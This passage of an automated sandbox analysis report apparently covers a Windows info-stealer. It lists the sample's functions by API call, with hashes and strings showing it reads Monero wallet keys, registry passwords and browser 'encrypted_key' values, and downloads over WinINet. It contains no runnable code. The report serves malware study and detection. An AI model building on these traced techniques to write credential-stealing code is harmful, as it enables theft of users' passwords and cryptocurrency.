                                        • lstrlen.KERNEL32(00000000), ref: 00CB532F
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00CB5364
                                        • lstrlen.KERNEL32(00000000), ref: 00CB5383
                                        • lstrlen.KERNEL32(00000000), ref: 00CB53AE
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 38793a2a080443eb886ed8b567dc53e3860da48fa1f9bf018e873e43510ef5e0
                                        • Instruction ID: c0d8a779feb7bfb99dbb311b291ec90b6fa315f771b23ccf4250ca33509cd217
                                        • Opcode Fuzzy Hash: 38793a2a080443eb886ed8b567dc53e3860da48fa1f9bf018e873e43510ef5e0
                                        • Instruction Fuzzy Hash: 9D510F30910148ABCB24FF61CDA6BED777DAF10301F544028F8466B592EF356B49EB62
                                        Function 00CB12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 3d49fc1e0716ce40af5ac29baa35b019441ba7ef02786fb8e22bbc53e07725b8
                                        • Instruction ID: e4cded8e8ce583cc5192867042a4975742fe181ca2ac048119faee5a7a308eaf
                                        • Opcode Fuzzy Hash: 3d49fc1e0716ce40af5ac29baa35b019441ba7ef02786fb8e22bbc53e07725b8
                                        • Instruction Fuzzy Hash: 8FC1A5B590021DABCB14EF60DCD9FEA7378BB54304F044598F50A67182EB71AE89DFA1
                                        Function 00CB4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB42EC
                                        • lstrcat.KERNEL32(?,009DEEB0), ref: 00CB430B
                                        • lstrcat.KERNEL32(?,?), ref: 00CB431F
                                        • lstrcat.KERNEL32(?,009DD608), ref: 00CB4333
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CB8D90: GetFileAttributesA.KERNEL32(00000000,?,00CA1B54,?,?,00CC564C,?,?,00CC0E1F), ref: 00CB8D9F
                                          • Part of subcall function 00CA9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CA9D39
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB93C0: GlobalAlloc.KERNEL32(00000000,00CB43DD,00CB43DD), ref: 00CB93D3
                                        • StrStrA.SHLWAPI(?,009DEF58), ref: 00CB43F3
                                        • GlobalFree.KERNEL32(?), ref: 00CB4512
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
                                          • Part of subcall function 00CA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
                                          • Part of subcall function 00CA9AC0: LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB44A3
                                        • StrCmpCA.SHLWAPI(?,00CC08D1), ref: 00CB44C0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CB44D2
                                        • lstrcat.KERNEL32(00000000,?), ref: 00CB44E5
                                        • lstrcat.KERNEL32(00000000,00CC0FB8), ref: 00CB44F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 1c2451604507ee0b3141ed2beac3428a36368ef99e62894cdb2cfc44f3a11ede
                                        • Instruction ID: 860cbdd7bcfb00e1f3fb42abdf44a5f965488826117db6b9e921c28aee194a2e
                                        • Opcode Fuzzy Hash: 1c2451604507ee0b3141ed2beac3428a36368ef99e62894cdb2cfc44f3a11ede
                                        • Instruction Fuzzy Hash: 8B712676D00208BBDB14EBA0DC8AFEE777DAB48304F044598F605A7181EA35EB49DF91
                                        Function 00CA1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CA12B4
                                          • Part of subcall function 00CA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00CA12BB
                                          • Part of subcall function 00CA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CA12D7
                                          • Part of subcall function 00CA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CA12F5
                                          • Part of subcall function 00CA12A0: RegCloseKey.ADVAPI32(?), ref: 00CA12FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CA134F
                                        • lstrlen.KERNEL32(?), ref: 00CA135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00CA1377
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00CA1465
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CA14EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 9e4eb9bb6b3f6b961be978f6d28589671be57753f0035e696cc65fc2afd4b615
                                        • Instruction ID: e77bf993f30463e6d6b80fb85ae687133386fead516cc11bb2ac742afe8c3151
                                        • Opcode Fuzzy Hash: 9e4eb9bb6b3f6b961be978f6d28589671be57753f0035e696cc65fc2afd4b615
                                        • Instruction Fuzzy Hash: 2E5134B1D501196BCB15FB60DD96FED737CAF54300F4041ACB64AA6082EE306B89DFA6
                                        Function 00CA75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CA733A
                                          • Part of subcall function 00CA72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CA73B1
                                          • Part of subcall function 00CA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CA740D
                                          • Part of subcall function 00CA72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00CA7452
                                          • Part of subcall function 00CA72D0: HeapFree.KERNEL32(00000000), ref: 00CA7459
                                        • lstrcat.KERNEL32(00000000,00CC17FC), ref: 00CA7606
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CA7648
                                        • lstrcat.KERNEL32(00000000, : ), ref: 00CA765A
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CA768F
                                        • lstrcat.KERNEL32(00000000,00CC1804), ref: 00CA76A0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CA76D3
                                        • lstrcat.KERNEL32(00000000,00CC1808), ref: 00CA76ED
                                        • task.LIBCPMTD ref: 00CA76FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: 025965903d0f257bec743f894d34386af06c894d5925f570108f08c6704f3814
                                        • Instruction ID: 8d7cc07ef2ed141f60d76601585c9edaf58a100fb505d9ad502b939f007f6357
                                        • Opcode Fuzzy Hash: 025965903d0f257bec743f894d34386af06c894d5925f570108f08c6704f3814
                                        • Instruction Fuzzy Hash: 463110B1D0014EDFCB08EBA5DC9AEFE7779BB46305B18412CF102BB191DA34A94ADB51
                                        Function 00CB8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009DEC28,00000000,?,00CC0E2C,00000000,?,00000000), ref: 00CB8130
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB8137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CB8158
                                        • __aulldiv.LIBCMT ref: 00CB8172
                                        • __aulldiv.LIBCMT ref: 00CB8180
                                        • wsprintfA.USER32 ref: 00CB81AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 02aa4ec15786fc65b60c9de7725aac0d695b0d8af22800933bd8edf38fb274d3
                                        • Instruction ID: 31caa6569161740587978e5493ca3644df0d1ef240cc5dc5a8fc61fbd6d16a4f
                                        • Opcode Fuzzy Hash: 02aa4ec15786fc65b60c9de7725aac0d695b0d8af22800933bd8edf38fb274d3
                                        • Instruction Fuzzy Hash: F7211AB1E44258ABDB04DFD5CC49FAEBBBCFB44B10F104619F605BB280D77869058BA5
                                        Function 00CA60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                        • InternetOpenA.WININET(00CC0DF7,00000001,00000000,00000000,00000000), ref: 00CA610F
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6147
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00CA618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00CA61B3
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00CA61DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CA620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00CA6249
                                        • InternetCloseHandle.WININET(?), ref: 00CA6253
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA6260
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: bc3c7270a4dcfeefb6dcc32809184173f0dc922a9140c03c6ce9371b0b3107b7
                                        • Instruction ID: 3455068355f9ffbf83a2e50df7f806e9def56375401337a7545763830316ac6a
                                        • Opcode Fuzzy Hash: bc3c7270a4dcfeefb6dcc32809184173f0dc922a9140c03c6ce9371b0b3107b7
                                        • Instruction Fuzzy Hash: B4518FB1900219AFDB20DFA1CC85BEE77B8EB04305F1481A8B605BB1C0DB746A89CF95
                                        Function 00CA72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CA733A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CA73B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CA740D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00CA7452
                                        • HeapFree.KERNEL32(00000000), ref: 00CA7459
                                        • task.LIBCPMTD ref: 00CA7555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 5cffa15788e49edb2cb59f32f61a245a852a0411b1f35facf7404e5dcc2471f6
                                        • Instruction ID: 4c77c5266674ff209a54e7396fb56ed6e18b8ef643055c3050cb45fa1ecd55d0
                                        • Opcode Fuzzy Hash: 5cffa15788e49edb2cb59f32f61a245a852a0411b1f35facf7404e5dcc2471f6
                                        • Instruction Fuzzy Hash: 63614AB5D0016D9BDB24DB50CC45BDAB7B8BF49304F0082E9E689A6141EF706BC9DFA1
                                        Function 00CABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
